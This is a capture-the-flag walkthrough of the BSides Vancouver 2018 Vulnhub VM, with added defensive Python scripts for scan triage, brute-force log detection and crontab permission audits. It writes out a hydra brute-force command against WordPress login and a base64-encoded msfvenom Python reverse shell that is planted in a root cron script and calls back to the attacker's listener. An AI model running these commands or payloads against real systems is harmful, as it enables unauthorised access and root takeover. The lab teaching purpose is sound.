The BSides Vancouver: 2018 (Workshop) VM download from Vulnhub can be found here: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
The creator of this VM is abatchy
Here's the basic description:
Boot2root challenges aim to create a safe environment where you can perform real-world penetration testing on an (intentionally) vulnerable target.
This workshop will provide you with a custom-made VM where the goal is to obtain root level access on it.
This is a great chance for people who want to get into pentesting but don’t know where to start.
If this sounds intimidating, don’t worry! During the workshop, we’ll be discussing various methodologies, common pitfalls and useful tools at every step of our pentest.
Workshop requirements:
- Laptop capable of running two VMs and with a USB port.
- At least 20GB of free space.
- VirtualBox pre-installed.
- Kali VM
- Some familiarity with CLI.
Using the following nmap command:
nmap -O -A -sT -sV -p- -T5 192.168.1.39 -vvv
We find out there are 3 services running: FTP, SSH, and a web service:
The text output with the relevant information is below; some of the SSH output has been stripped for site layout purposes:
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 17:52 public
| FTP server status:
| Connected to 192.168.1.29
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
The FTP service is set up to allow anonymous authentication with access to view a folder called "public". Using my web browser, I can view the public directory:
Inside the public directory we find a backup of a text file called users.txt.bk.
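The nmap output above carries the findings a defender cares about (anonymous FTP enabled, a plaintext control channel, a robots.txt with disallowed entries), but reading them out of a long scan by hand does not scale. The following is an added example, not code from the original post: it parses nmap's normal text output (the constructed sample below is a trimmed copy of the table above) and turns the NSE script lines into a short findings list. The regex and the finding strings are my assumptions about nmap's output format; nothing here talks to a host.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed copy of the nmap service table shown in the post.
SAMPLE_NMAP = """\
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 17:52 public
| Control connection is plain text
| Data connections will be plain text
22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.2.22 (Ubuntu)
"""

# port/proto  state  service  reason  version...  (assumed nmap "normal" output layout)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Service:
    port: int
    state: str
    name: str
    version: str
    script_lines: list = field(default_factory=list)  # NSE script output ("| ..." lines)


def parse_services(text):
    """Parse port lines and attach the following '|' script lines to that port."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            services.append(Service(int(m.group(1)), m.group(3), m.group(4), m.group(6).strip()))
        elif line.startswith("|") and services:
            # strip the "| " / "|_" prefix nmap puts in front of script output
            services[-1].script_lines.append(line.lstrip("|_ ").strip())
    return services


def triage(services):
    """Return (port, finding) pairs for the weaknesses the scan itself reports."""
    findings = []
    for svc in services:
        for info in svc.script_lines:
            if "Anonymous FTP login allowed" in info:
                findings.append((svc.port, "anonymous FTP login enabled"))
            if "plain text" in info:
                findings.append((svc.port, "cleartext channel: " + info))
            if "disallowed entr" in info:
                findings.append((svc.port, "robots.txt hides paths worth reviewing: " + info))
    return findings


if __name__ == "__main__":
    for port, finding in triage(parse_services(SAMPLE_NMAP)):
        print(f"{port}/tcp: {finding}")
```

Feeding it a real `nmap -oN` file works the same way; the point is that the scan already tells you which services need hardening (disable `anonymous_enable` in vsftpd, or retire FTP for SFTP) before anyone looks at the directory listing.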
I ran a number of different scans against the web service. Some of these tools included nikto, dirb, and dirbuster.
For this exercise, just showing the nikto output I feel is sufficient since the rest is just overkill.
So here was the Nikto command and scan results:
Nikto ended up finding a robots.txt file that had a disallow entry for /backup_wordpress
At this point we know there is a WordPress install on that site. Loading up the wpscan tool with the following command:
wpscan -u http://192.168.1.39/backup_wordpress --enumerate u --enumerate p --enumerate t
We got the following interesting output:
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+-------+------+
| Id | Login | Name |
+----+-------+------+
| 1  | admin | admi |
| 2  | john  | joh  |
+----+-------+------+
[!] Default first WordPress username 'admin' is still used
Between the WordPress user list and the users backup file we found on the FTP service, john is the user whose credentials we should try to recover.
Using THC Hydra, a password brute-forcing tool, we were able to obtain john's password. The following hydra command was used:
hydra -l john -P /root/Desktop/rockyou.txt 192.168.1.39 -V http-post-form '/backup_wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 25
Breaking down the above command:
- -l john - specify that the target user is john
- -P /root/Desktop/rockyou.txt - load the rockyou password file
- -V - verbose mode
- http-post-form - the Hydra module to use: an HTTP POST form attack
- /backup_wordpress/wp-login.php: - target URI of the login page
- log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1 - the form fields for username and password, with ^USER^ and ^PASS^ substituted by hydra from the options above
- S=Location - success criteria: hydra greps the response for "Location"; if it is found, the login was successful
- -t 25 - run 25 parallel connection tasks; anything higher on this VM and it breaks (found by trial and error)
The attack took about 11 minutes to find the password, enigma, which was on line 2531 of the rockyou.txt file:
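The `S=Location` success criterion above relies on WordPress behaviour that also works in the defender's favour: a failed login re-renders wp-login.php with a 200, while a successful one answers with a 302 redirect. That makes a wordlist attack against wp-login.php easy to spot in the web server's access log. The following is an added example, not code from the original post: it parses Apache combined-format log lines (the sample lines are constructed here, modelled on the attack described above) and flags any source IP that POSTs to the login page more than `threshold` times inside a sliding window, reporting whether a redirect (likely success) followed. The log format, the status-code heuristic and the thresholds are my assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def login_attempts(lines, login_path="/wp-login.php"):
    """Group POSTs to the login page by source IP, sorted by time."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith(login_path):
            by_ip[rec["ip"]].append(rec)
    for recs in by_ip.values():
        recs.sort(key=lambda r: r["ts"])
    return by_ip


def detect_bruteforce(lines, threshold=20, window_seconds=60):
    """Return {ip: (total_attempts, redirect_seen)} for IPs that made at least
    `threshold` login POSTs within any `window_seconds` span. A 301/302 among a
    run of 200s means the form stopped re-rendering, i.e. a login likely succeeded."""
    window = timedelta(seconds=window_seconds)
    alerts = {}
    for ip, recs in login_attempts(lines).items():
        start = 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1  # slide the window forward
            if end - start + 1 >= threshold:
                succeeded = any(r["status"] in (301, 302) for r in recs)
                alerts[ip] = (len(recs), succeeded)
                break
    return alerts


def constructed_log():
    """Constructed sample: 30 failed guesses in 15 seconds from one host, then a
    302 (success) from it, plus one ordinary login from a different host."""
    base = datetime.strptime("03/Mar/2018:17:55:00 +0000", TS_FMT)
    fmt = ('{ip} - - [{ts}] "POST /backup_wordpress/wp-login.php HTTP/1.0" '
           '{status} 3211 "-" "Mozilla/4.0 (constructed)"')
    lines = []
    for i in range(30):
        ts = (base + timedelta(seconds=i // 2)).strftime(TS_FMT)
        lines.append(fmt.format(ip="192.168.1.29", ts=ts, status=200))
    ts = (base + timedelta(seconds=16)).strftime(TS_FMT)
    lines.append(fmt.format(ip="192.168.1.29", ts=ts, status=302))
    lines.append(fmt.format(ip="192.168.1.50", ts=ts, status=302))
    return lines


if __name__ == "__main__":
    for ip, (count, success) in detect_bruteforce(constructed_log()).items():
        print(f"{ip}: {count} login POSTs, redirect seen: {success}")
```

A real deployment would read `/var/log/apache2/access.log` and feed the alert into fail2ban or a WAF rule; the same log is what the cleanup cron job in the next section wipes every run, which is a second reason that job is a problem.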
Loading up the metasploit framework console, I used the following exploit:
Then set my options
After setting all the necessary options, simply type run to kick off the exploit. After entering run you should be presented with a meterpreter shell:
And now we have a shell running under the web service:
After digging around on the machine for some time, I found the crontab owned by root was world readable.
So root has this cleanup script that runs basically every second, based on the numerous leading asterisks in the schedule fields that denote when it should run. The cleanup script has world read, write and execute permissions (777):
I proceeded to download this script from the meterpreter shell:
The contents of the script:
#!/bin/sh
rm -rf /var/log/apache2/* # Clean those damn logs!!
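The root cause of this privilege escalation is a script that root executes on a schedule but that any user can edit. That condition is trivial to audit for. The following is an added example, not code from the original post: it parses system crontab text (`/etc/crontab` and `/etc/cron.d` format: five schedule fields, a user, then the command), finds absolute paths in each command, and reports any regular file that is writable by group or others. The demo builds two scripts in a temporary directory (one mode 777, one 755) and a constructed crontab pointing at them; the path names and helper names are my own.

```python
import os
import shlex
import stat
import tempfile


def cron_commands(crontab_text):
    """Yield (schedule, user, command) from system-crontab style lines."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or environment assignment such as SHELL=/bin/sh
        if line.startswith("@"):  # @reboot, @daily, ...
            fields = line.split(None, 2)
            if len(fields) == 3:
                yield fields[0], fields[1], fields[2]
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield " ".join(fields[:5]), fields[5], fields[6]


def absolute_paths(command):
    """Every absolute-path token in the command (interpreter, script, arguments)."""
    return [tok for tok in shlex.split(command) if tok.startswith("/")]


def writable_by_others(path):
    """True for a regular file with the group- or other-write bit set."""
    st = os.stat(path)
    if not stat.S_ISREG(st.st_mode):
        return False  # skip devices such as /dev/null, which are meant to be 0666
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(crontab_text):
    """Return (user, path, mode) for every existing file referenced by a cron
    command that someone other than its owner could modify: whoever can edit
    it gets code execution as `user` on the next run."""
    issues = []
    for _schedule, user, command in cron_commands(crontab_text):
        for path in absolute_paths(command):
            if os.path.exists(path) and writable_by_others(path):
                mode = stat.S_IMODE(os.stat(path).st_mode)
                issues.append((user, path, oct(mode)))
    return issues


def demo():
    """Constructed demo: a 777 cleanup script and a 755 script in a temp dir."""
    d = tempfile.mkdtemp()
    bad = os.path.join(d, "cleanup.sh")
    good = os.path.join(d, "rotate.sh")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    crontab = f"""# constructed /etc/crontab for the demo
SHELL=/bin/sh
* * * * * root {bad}
0 3 * * * root {good} --weekly > /dev/null
@reboot root /nonexistent/constructed/path
"""
    return audit_crontab(crontab), bad


if __name__ == "__main__":
    issues, _ = demo()
    for user, path, mode in issues:
        print(f"{user} runs {path} with mode {mode}: writable by others")
```

Run against the real files (`open("/etc/crontab").read()` plus each file under `/etc/cron.d`), the fix for any hit is `chmod 755` and `chown root:root` on the script, and the check belongs in a configuration scanner or a CI lint for the images you ship.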
Using msfvenom, we will replace the contents of the cleanup script with a Python reverse shell generated by the following command:
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.29 lport=8888
msfvenom will then output a chunk of code that will be our Python reverse shell:
python -c "exec('aW1wb3J0IHNvY2tldCAgICAsIHN1YnByb2Nlc3MgICAgLCBvcyAgOyAgICAgICAgIGhvc3Q9IjE5Mi4xNjguMS4yOSIgIDsgICAgICAgICBwb3J0PTg4ODggIDsgICAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgLCBzb2NrZXQuU09DS19TVFJFQU0pICA7ICAgICAgICAgcy5jb25uZWN0KChob3N0ICAgICwgcG9ydCkpICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgMCkgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAxKSAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsIDIpICA7ICAgICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"
I replaced the command previously in the cleanup script with the above Python code.
After editing in my payload, I upload the script back to the server in my meterpreter shell:
Then on my Kali system I create a netcat listener on port 8888 using
nc -lvp 8888
After a brief moment, I receive the reverse root shell as expected:
In the /root directory there is a flag.txt file which basically says congrats, you obtained root. It also says there were numerous other ways to obtain root; did you find them?
There you have it!